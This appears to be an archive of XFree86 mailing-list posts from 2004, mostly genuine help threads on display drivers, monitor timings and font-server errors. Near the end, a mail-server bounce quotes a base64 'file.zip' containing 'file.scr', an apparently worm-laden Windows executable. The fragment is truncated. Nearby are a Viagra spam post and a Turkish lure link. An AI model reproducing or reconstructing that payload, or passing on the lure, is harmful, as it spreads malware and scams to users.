 crt at a frequency that is out of range.
Yes, this should be a good idea, but I don't have the capacity to do so.

 Could this be used to fix i810switch?  Could we program SXGA+ resolution
 without relying on the BIOS?
IMHO this is done by the Windows driver to manage SXGA+. So there's a
way to do the same on GNU/Linux, but again I don't have the capacities.

 ===
 (--) PCI:*(0:2:0) Intel Corp. 82852/855GM Integrated Graphics Device
rev 2,
 Mem @ 0xf000/27, 0xffa8/19, I/O @ 0xdc00/3
 (--) PCI: (0:2:1) Intel Corp. 82852/855GM Integrated Graphics Device
rev 2,
 Mem @ 0xe800/27, 0xff98/19
These are the 2 video devices added in your XF86Config-4 (and mine,
too), but the external CRT works even if you've just one device. I think
we need the 2 to have LCD+CRT on different resolutions (not in mirror
mode, but desktop extended with Xinerama), but ATM I can't get them working.

 (II) I810(0): No active displays on Pipe A.
 (II) I810(0): Currently active displays on Pipe B:
 (II) I810(0): LFP (local flat panel)
This is my normal situation if I use the internal LCD (as from the LCD
log I attached). On the other hand, from the CRT log I've exactly the
contrary (active Pipe A). As I wrote above, you should have the CRT
active on a pipe to use it on X.

Thx, bye,
Gismo / Luca
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Debian - http://enigmail.mozdev.org

iD8DBQFAI/8KVAp7Xm10JmkRAhlTAJ45UJBcvf+GD9TPOoZdhlL3U72JswCfdBJK
DLp3RUu+RwwdmwrBxzYX9h0=
=173w
-END PGP SIGNATURE-


XFree86.0.log.CRT.gz
Description: GNU Zip compressed data


XFree86.0.log.LCD.gz
Description: GNU Zip compressed data


Re: [XFree86] GLIBC_2.3

2004-02-06 Thread Michael Taylor
[EMAIL PROTECTED] wrote:
 Hi All,
  I'm trying to install OpenSSL-0.9.7a-20 for RH 7.3 and I received the
 following message:
   error: failed dependencies: libc.so.6(GLIBC_2.3) is needed by
 openssl-0.9.7a-20
 
 Where can I download this library ?

This mailing list is about XFree86, not Red Hat Linux 7.3 or OpenSSL.

You most likely want to use a local FTP/HTTP mirror
http://ftp.redhat.com/pub/redhat/linux/updates/7.3/en/os/ to download the
latest update to OpenSSL for RH Linux 7.3 -- openssl-0.9.6b-35.7.i386.rpm where
i386 is i386-i686 or athlon.


___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Sony GDM-5402 Monitor

2004-02-06 Thread Mark Vojkovich
   If I recall correctly, you were using a rather old XFree86
version.  You'll probably want to upgrade to 4.3.0 or one of
the pre-4.4 snapshots.


Mark.

On Fri, 6 Feb 2004, Christian Kremser wrote:

 Re: Mark Vojkovich
 
 You were right! I get the same problem with another monitor. What
 can I do about the driver? I got my basic configuration file with
 X -configurewhich obviously determined the necessary driver 
 by itself. Would it help to upgrade xfree ?
 
 Re: William Gallafent
 
 I tried your less challenging parameters, however, again 
 without success. Somehow the only mode which seems to work is 
 640x480 as long as I don't give HorizSync and VertRefresh values.
 
 Interestingly I had a working display before installing Debian 3.0!
 
 Thanks again to your replies!
 Christian.
 
 Mark Vojkovich wrote:
 
 These specifications are that of a multisync monitor, so
  it should sync to any default mode that XFree86 picks for it
  if you have filled in the HorizSync and VertRefresh appropriately
  in the XF86Config file.  Other info on the web that I see
  confirms the specifications of:
  
HorizSync  30 - 121
VertRefresh 48 - 160
  
  It sounds like you have a problem with the monitor or graphics
  card or graphics card driver (most likely the later).  
  
 Do any modes work correctly?
  
 You might want to try borrowing another monitor to see
  if you get the same problem on a different monitor.  I would
  guess that you would, and that it's a driver problem.
  
  
  Mark.
  
  
  
  On Wed, 4 Feb 2004, Christian Kremser wrote:
  
  
 I have a 21-inch Sony GDM-5402 monitor connected to my LINUX 
 computer (ELSA Gloria XXL graphics card; 3Dlabs chipset pm2v). I 
 recently installed a new LINUX version (Debian 3.0r2) with XFree 
 Version 4.1.0.1. Unfortunately I'm not able to find a proper 
 working configuration for my monitor. With the attached 
 XF86Config-4 file I tried to leave finding of a proper 
 configuration to the X-server. With this I only get a 640x480 
 screen mode. When I give the correct HorizSync and VertRefresh 
 data in the monitor section the XServer also finds other modes 
 (default 1280x1024) which, however, are nor working properly. I 
 tried to calculate ModeLine parameters (e.g. 
 http://xtiming.sourceforge.net) with the specifications given in 
 the manual of the monitor, but also could not find a working 
 configuration. Since I already spent too many hours with that 
 problem I would be grateful if anybody would have some 
 suggestions for me!
 
 The monitor has the following specifications:
 - recommended resolution: 1600x1280
 - deflection frequency: horizontal: 30 to 121kHz
  vertical: 48 to 160 Hz
 - Plug and Play: DDC1/2B/2Bi, GTF
 
 The recommended horizontal and vertical timing conditions for the 
 monitor are:
 - horizontal sync width duty should be more than 4.8% of total 
 horizontal time or 0.8microsec, whichever is larger.
 - horizontal blanking width should be more than 2.3microsec
 - vertical blanking width should be more than 450micorsec.
 
 Thanks in advance!
 Christian.
 
 -- 
 
 Dept. of Radiology
 Rad1 / Magnetic Resonance
 University of Innsbruck
 Anichstr. 35
 A-6020 Innsbruck
 AUSTRIA
 
 Tel.:   ++43/512/504/4493
 Fax.:   ++43/512/504/4419
 PC-Fax.:   ++43/512/504/674493
 Email: [EMAIL PROTECTED]
 
  
  
  ___
  XFree86 mailing list
  [EMAIL PROTECTED]
  http://XFree86.Org/mailman/listinfo/xfree86
 
 
 
 
 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86
 

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] I cannot understand this warning

2004-02-06 Thread Mark Vojkovich
   It means you don't have MTRR support in your kernel and
subsequently performance will suffer.  I'm assuming FreeBSD
even supports MTRRs (Linux does).


Mark.

On Fri, 6 Feb 2004, Federico Mantovani wrote:

 Hi to all the members of this mailing-list. I have just installed
 FreeBSD 4.9-STABLE on my laptop a Toshiba Satellite 4030 CDS with a
 Triden Cyber 9525/DVD card.
 I configured the X server (I am using XFree86 4.3.0): everything seems
 to work fine, but I receive in /var/log/XFree86.0.log the following warning:
 
 (==) TRIDENT(0): Write-combining range (0xff7e,0x2) was already
 clear
 (WW) TRIDENT(0): Failed to set write-combining range (0xff80,0x280)
 
 I have searched with Google and in some newsgroups for the meaning of
 this warning. I repeat: everything works fine, but I'd like to know why
 I get these lines in the log file. Thanks in advance.
 
 Federico Mantovani
 
 -- 
 Dalla scuola di guerra della vita -
 - Quel che non mi uccide, mi rende piu' forte.
 
 Friedrich Nietzsche
 
 
 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86
 

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Problem...

2004-02-06 Thread Mark Vojkovich
   You have two video cards: an ATI and a Trident.  The ATI
is the one that the console comes up on.  I assume it's the Trident
card you are trying to get to work.  It sounds like you changed
the PCI slot the Trident card was in.  Subsequently you'll need
to have the line:

  BusID PCI:1:0:0

In the Trident card's Section Device of the XF86Config file.


Mark.

On Fri, 6 Feb 2004 [EMAIL PROTECTED] wrote:

 Hi,
 
 I have attached the log file for my problem...
 I installed Redhat 7.3 and once or twice everything was fine.
 then I installed a USB PCI card and later removed it , and since then
 I cannot get X graphics to work.
 
 please help.
 
 logfile attached.
 
 thanks,
 Kanda.
 

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] TWM patches

2004-02-06 Thread Alexander Pohoyda
Hi,

Would somebody please have a look at my TWM patches?

http://bugs.xfree86.org/show_bug.cgi?id=968
XPM icon support.

http://bugs.xfree86.org/show_bug.cgi?id=1078
Function to change window titles.

http://bugs.xfree86.org/show_bug.cgi?id=1124
IconMaxWidth parameter to limit the width of the icon window (Mozilla
tends to have very long titles)

These all are small enhancements, but I'd like to know if they have
any chance to be accepted.

Thank you very much!

-- 
Alexander Pohoyda [EMAIL PROTECTED]
PGP Key fingerprint: 7F C9 CC 5A 75 CD 89 72  15 54 5F 62 20 23 C6 44
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Fwd: hoeuag Orginial dicsont ixu.

2004-02-06 Thread didl bye



Hello levaktvvan mon jubgrop!
One Timedicsuontorder for
cehpaest vaiagra.For more innffo  oppen atttacch.




[XFree86] Re: [XFree86] Problème avec ma carte graphieu Radeon VE

2004-02-06 Thread Alexander Stohr
 Symbol xf86SetDDCproperties from module
/usr/X11R6/lib/modules/drivers/radeon_drv.o is unresolved!

try loading existing DDC related modules
via entrys in XF86Config load section.
this should help killing the segmentation fault
in your X4.3.0 Yellow Dog branded system.

-Alex.

- Original Message - 
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, February 06, 2004 11:21 AM
Subject: [XFree86] Problème avec ma carte graphieu Radeon VE


Hello guys, I have a little problem with my graphic card Radeon VE...
This is my hardware configuration :

Power Macintosh G4
. CPU : 400 Mhz
. Memory : 256 Mb of SdRam + 512 Mb of SdRam
. HDD : Seagate Barracuda ATA IV 40 Gb (connecté sur le premier canal
IDE en slave).
. Graphic card : ATI Radeon VE (32 Mo)
. DVD-rom : Hitachi 32x (connecté sur le second canal IDE en master)
. Lecteur Zip : 100 Mb (connecté sur le second canal IDE en slave)

. Ecran : Apple Studio Display 17' (ADC) (connected to the graphic
cardd with « DVIator for ADC ».)
. Clavier : Apple USB Keyboard (mappage Suisse Romand)
. Souris : Apple USB Mouse (1 bouton)


Thanks for the answer les gars !!!



[EMAIL PROTECTED]


___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] IO error 104 on Xserver

2004-02-06 Thread Alexander Stohr
what sort of prompt?
login-prompt or shell prompt?

in the first case, please log in and type startx,
in the second case simply type startx.

but of course it can be that your install failed silently
and some major components were missing which do
normally start the x-server automatically.

if anything is okay then for permanently launching 
into X11 you can change your inittab settings from 3 to 5.

-Alex.

- Original Message - 
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, January 31, 2004 12:52 AM
Subject: [XFree86] IO error 104 on Xserver


 
 I had installed Mandrake 9.2 on my pc. 
 The only installation witch I had to do was the monitor : 
 video generic vesa 
 640x480 raf vertical 60 hz 
 Its name is AMAGA 509 
  
 The reboot of the system give me a promtp. 
 I don't know how to launch KDE. 
  
 NB: with the knoppix cd, everything is allright. KDE start well. 
  
  
 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86
 
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Starting xserver problem

2004-02-06 Thread Alexander Stohr
the command startx does not change from runlevel 3 to 5,
but it does launch an x-server whilst you will still stay in runlevel 3.
changing from 3 to 5 is done via init 5 - which means the init-daemon
will launch some amount of programs including X11, which are listed for
level 5.

if you dont have network connected font servers in your local network,
then you can disable the Unix font path line from your XF86Config file.

other than that you should have font paths in reach on your local machine.
to my best knowledge there was some access rights bug in an RH-RPM file
that did concern fonts. please make sure you have installed latest updates.

xfs is the font server demon, you might want to try to disable those service
if you find it usefull for diagnostics. i am not totally deep in font
managent but
i assume it is not absolutely a needed component but raises problems
sometimes.

-Alex.

- Original Message - 
From: Martin Roy [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, January 23, 2004 4:18 PM
Subject: [XFree86] Starting xserver problem


Hi, i have this problems for many years.

OS:   RHEL ES v.3
Rpm : XFree86-4.3.0-35.EL

I do not know why, my xserver does not want to start from level 3 to 5 with
the command startx.

Notice that problem is coming from no where and it is random and
sporadicaly.

A) Here the core error message that i get when i tried to start xserver:

 Could not init font path element unix/:7100, removing from list!
Fatal server error: could not open default font 'fixed'
X10:  fatal IO error 104 (Connection reset by peer) on X server :0.0
   after 0 requests (0 known processed) with 0 events remainning.

B) Here also the messages that i get when i boot the system :

 Jan 23 08:41:12 station2 xfs: xfs startup succeeded 
 Jan 23 08:41:12 station2 xfs: cannot establish any listening sockets 

If you could provide me with some directions to solve this problem, I would
greatly appreciate it.

Thanks

Martin Roy
www.linuxsoft.ca

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] need specs for monitor

2004-02-06 Thread John P. Conlon
Try the link below.  It looks like it might be a chinese monitor
http://www.greatwall.com.cn/eng/product/moni-ks.htm
[EMAIL PROTECTED] wrote:

Aloha

I'm setting up FreeBSD on an inherited system with an unknown monitor. I'm in need of the HorizSync and VertRefresh settings.

The label on the back has the following info

A PLUS INFO CORP
Model AS1570
Serial # MB5S52002694
Manufactured March 19, 2002
I've googled for the monitor specs and recived a lot of info on 1570 monitors but none have worked. I can not get a response to AS1570. 

The only thing I  have found when google-ing for A PLUS is the address and phone number in Taiwan. I have LindowsOS loaded on a different partition on this system but the data in XF86Config there does not seem to work with FreeBSD.

Any ideas?

Thanks for your help
Robert
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86
 

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: Re: [XFree86] need specs for monitor

2004-02-06 Thread marella
Mahalo Nui Loa!!
For you mainlanders, that means Thank you very much. I don't know how I missed that 
site. 

Robert
 
 From: John P. Conlon [EMAIL PROTECTED]
 Date: 2004/02/06 Fri PM 08:25:25 EST
 To: [EMAIL PROTECTED]
 Subject: Re: [XFree86] need specs for monitor
 
 Try the link below.  It looks like it might be a chinese monitor
 http://www.greatwall.com.cn/eng/product/moni-ks.htm
 
 [EMAIL PROTECTED] wrote:
 
 Aloha
 
 I'm setting up FreeBSD on an inherited system with an unknown monitor. I'm in need 
 of the HorizSync and VertRefresh settings.
 
 The label on the back has the following info
 
 A PLUS INFO CORP
 Model AS1570
 Serial # MB5S52002694
 Manufactured March 19, 2002
 
 I've googled for the monitor specs and recived a lot of info on 1570 monitors but 
 none have worked. I can not get a response to AS1570. 
 
 The only thing I  have found when google-ing for A PLUS is the address and phone 
 number in Taiwan. I have LindowsOS loaded on a different partition on this system 
 but the data in XF86Config there does not seem to work with FreeBSD.
 
 Any ideas?
 
 Thanks for your help
 Robert
 
 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86
 
   
 
 
 ___
 XFree86 mailing list
 [EMAIL PROTECTED]
 http://XFree86.Org/mailman/listinfo/xfree86
 


___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Re: hello

2004-02-06 Thread mailserver-reply
 This is a multi-part message in MIME format.
** `This' is not a recognized command.  Try HELP.
** (will search for a line with word 'begin' (or 'BEGIN') in case
**  your system puts garbade at the begin of your email)
 --=_NextPart_000_0011_166F1367.F651A8F9
 Content-Type: text/plain;
 charset=Windows-1252
 Content-Transfer-Encoding: 7bit
 The message contains Unicode characters and has been sent as a binary attachment.
 --=_NextPart_000_0011_166F1367.F651A8F9
 Content-Type: application/octet-stream;
 name=file.zip
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 filename=file.zip
 UEsDBAoAAMZtRjDKJx+eAFgAAABYAAAIZmlsZS5zY3JNWpAAAwQAAAD//wAAuAAA
 AABAAACo
 
 AABQRQAATAEDAOAA
 DwELAQcAAFAQYAAAYL4AAABwwABKAAAQAgAABAAE
 AADQEAIAABAAABAAEAAAEBAAAOjBAAAwAQAA
 AMAAAOgB
 AFVQ
 WDAAAGAQAAQAAIAAAOBVUFgxAABQcFAA
 AAAEAABAAADgLnJzcmMAEMAEVAAA
 QAAAwAAA
 
 
 
 
 
 
 AAAx
 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
 

[XFree86] Re: selam

2004-02-06 Thread aslihan
Selam Xpert,
Su an saat Fri, 06 Feb 2004 23:22:06 -0600
Nerelerdeydin uzun zamandýr görüþemedik.
   
Neyse lafý fazla uzatmayayým bak senin için bir site hazýrladým.
Mutlaka görmelisin.Adres aþaðýda yazýlý hadi görüþürüz.
http://Xpert.resimleri.com

MwoAj3iMV1AFJ3vq6ArEOOJ
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86